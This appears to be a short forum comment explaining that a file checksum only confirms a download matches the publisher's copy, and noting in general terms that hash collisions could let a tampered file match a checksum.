It only verifies that the contents of the file you end up with on your hard drive is the same as the file the publisher used to create the checksum. You still can’t trust the file any more than you trust the publisher.

Also there is such a thing as hash collisions. Basically this means that multiple different files can lead to the same checksum. You can add a nefarious payload to a file and then modify or pad the remainder of the file so that the resulting checksum is the same. It’s pretty difficult to do but its definitely feasible.